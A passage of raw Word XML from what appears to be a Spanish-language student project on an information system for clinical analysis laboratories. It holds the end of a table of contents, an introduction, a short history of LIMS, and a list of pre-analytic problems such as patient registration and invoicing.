                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</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27" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.6.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371327 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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28" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.7.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Parametrización de </w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371328 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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29" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.8.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Generar Reportes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371329 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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30" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.9.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Personalizar interfaz</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371330 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371331" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.2.10.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Recepción de pacientes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371331 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371332" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Análisis de Paquetes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371332 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371333" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 5.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Diseño</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371333 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc454371280"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCCIÓN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Los sistemas de información actuales en los laboratorios de análisis juegan un rol importante, ya que sin un sistema que permita el manejo adecuado y preciso de la información se podría dar el problema de perder resultados, información del paciente entre otras informaciones valiosas que se pueda obtener sin un sistema de información de laboratorio de análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Con el fin de terminar esos problemas el sistema de información será capaz de sobre llevar todo lo concerniente a la información y se adaptará a cualquier laboratorio de análisis que hay actualmente en nuestro medio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Este sistema será de gran ayuda para el laboratorio que lo adquiera y será de gran utilidad para los usuarios que interactúen con el mismo ya que se destacará por tener una interfaz amigable, fácil de usar, etc.; con lo cual permitirá al usuario poder sentirse cómodo con el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Otro de los puntos por lo que es importante poder contar con un sistema de información en un laboratorio de análisis es que permite a los usuarios poder tener una forma más organizada de almacenar los datos y con mayor rapidez para almacenarla la cual permite a los pacientes no tener que esperar tanto para dar los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Es necesario contribuir al mejoramiento del sistema de información con respecto a la salud en nuestra ciudad, a partir de la innovación y el progreso de cada uno de sus componentes, en beneficio de la salud y expectativas de la población. Con el desarrollo de esta propuesta se podría generar la necesidad de buscar alternativas similares en otras entidades prestadoras de servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Es preciso continuar buscando mecanismos de protección financiera para los costos del proceso salud-enfermedad. El enfoque preventivo del sistema de salud puede ser uno de los más efectivos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>En fin, estas son las razones por la que un sistema en general puede ayudar de mucho en una institución, tal como lo es el sistema de laboratorio para análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6D33" w:rsidRDefault="00BD6D33">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc454371281"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Problema de Investigación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc454371282"/>
      <w:r>
        <w:t>Antecedentes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve">Hasta finales de 1970, la gestión de las muestras de laboratorio, análisis y la presentación de informes eran procesos manuales que consumían mucho tiempo y estaban plagados de errores de transcripción. Esto dio impulso a las organizaciones a agilizar la recolección de datos y cómo se proyectan. Soluciones a medida fueron desarrolladas por algunos laboratorios individuales, mientras que algunas entidades emprendedoras al mismo tiempo trataron de desarrollar una solución de informes más comercial en la forma de sistemas especiales basados en instrumentos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t>En 1982, la primera generación de LIMS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746B31">
        <w:t>Laboratory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746B31">
        <w:t>Information</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve"> Management </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746B31">
        <w:t>System</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve">) se introdujo en forma de una sola minicomputadora centralizada, que ofreció a los laboratorios la primera oportunidad de utilizar las herramientas de informes automatizados. A medida que el interés en estos primeros LIMS creció, los líderes de la industria como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746B31">
        <w:t>Gerst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746B31">
        <w:t>Gibbon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve"> del Centro de Tecnología Energética Federal en Pittsburgh comenzaron a plantar las semillas a través de conferencias relacionadas con el LIMS. Para 1988 las ofertas comerciales de segunda generación estaban interviniendo en las bases de datos relacionales para ampliar LIMS en los mercados. Como los ordenadores personales se hicieron más poderosos y prominentes, una tercera generación de LIMS surgió a principios de 1990. Estos nuevos LIMS se aprovecharon de la arquitectura cliente / servidor de desarrollo, permitiendo laboratorios para implementar un mejor procesamiento de datos y el intercambio de los mismos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve">Para 1995 las herramientas de cliente / servidor se habían desarrollado hasta el punto de permitir el procesamiento de los datos en cualquier lugar de la red. LIMS habilitados para la Web se introdujeron el año siguiente, lo que permite a los investigadores ampliar las operaciones fuera de los confines del laboratorio. De 1996 a 2002 una funcionalidad adicional se incluyó en LIMS, de redes inalámbricas capacidades y georreferenciación de las muestras, a la adopción de XML normas y el desarrollo de las compras por Internet. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t xml:space="preserve">A partir de 2012, algunos LIMS han añadido características adicionales que siguen dando forma a cómo se define un LIMS. Los ejemplos incluyen la adición de funcionalidad clínica, cuaderno de laboratorio electrónico (ELN), así como un aumento en el software como servicio (SaaS) modelo de distribución. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00ED68D7"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00ED68D7"/>
    <w:p w:rsidR="00746B31" w:rsidRPr="00746B31" w:rsidRDefault="00746B31" w:rsidP="00ED68D7"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc454371283"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Definición del Problema</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc454371284"/>
      <w:r>
        <w:t>Situación problemática</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t>Es de conocimiento general que toda empresa en el rubro médico o negocio que se dedica al análisis clínico a pacientes, desea tener un control exhaustivo de su información para poder determinar con facilidad si su negocio es rentable o no.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t>Para los Laboratorios Clínicos es imprescindible la gestión automatizada de la información de los pacientes y que les brinde en corto tiempo toda información que requiera con el fin de tomar decisiones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRPr="00746B31" w:rsidRDefault="00ED68D7" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00746B31">
        <w:t>A continuación, describimos los problemas básicos que tienen los Laboratorios Clínicos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Proceso Pre-Analítico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A la hora de registrar un nuevo paciente en el Laboratorio Clínico, nos encontramos con un inconveniente debido a la falta de un sistema automatizado que lo gestione como tal, esto ocasiona falencias que demoran el registro del nuevo paciente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Las automatizaciones de los datos como tal hacen que en gran medida afecten al resto del proceso del análisis para su mayor calidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>El tipo de petición del paciente ya sea ordinaria, urgente preferente u otra. Suele condicionar una logística diferente, el cual puede ser automatizado para una atención de mayor calidad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Con la comodidad de disponer un sistema de información para un Laboratorio Clínico facilitamos la revisión retrospectiva de métodos de diagnósticos y tratamientos para los pacientes de forma personalizada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>En el momento de emitir factura es muy más factible contar con un sistema que te disponga los datos automatizados de cada paciente y así poder aprovechar aún más el tiempo con solo dar la orden de imprimir una factura, sin tener que preocuparnos por las reglas correspondientes al momento de emitir una factura ya que al ser automatizado no nos preocupados de esos puntos que pueden ser cometidos por fallas humanas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La identificación de cada muestra a partir de su correspondiente paciente hace que se tenga un seguimiento como tal registrándolo en cada proceso que pasa esa muestra durante todo el proceso y así tener un historial de análisis par</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D33">
        <w:t xml:space="preserve">a cada paciente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
